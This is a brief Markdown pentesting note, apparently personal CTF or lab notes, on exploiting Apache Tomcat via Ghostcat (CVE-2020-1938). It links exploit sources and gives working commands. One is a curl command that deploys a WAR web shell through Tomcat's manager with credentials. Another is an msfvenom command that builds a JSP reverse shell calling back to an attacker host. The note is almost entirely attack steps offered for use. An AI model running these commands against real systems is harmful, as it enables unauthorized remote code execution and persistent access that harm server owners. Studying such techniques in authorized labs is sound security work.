15 lines
564 B
Markdown
15 lines
564 B
Markdown
# Ghostcat
|
|
|
|
* CVE-2020-1938
|
|
* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143)
|
|
* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell)
|
|
* upload the file via
|
|
```sh
|
|
curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
|
|
```
|
|
* Visit the webshell at `$TARGET_IP:8080/shello/`
|
|
* Alternatively use a war reverse shell via
|
|
```sh
|
|
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war
|
|
```
|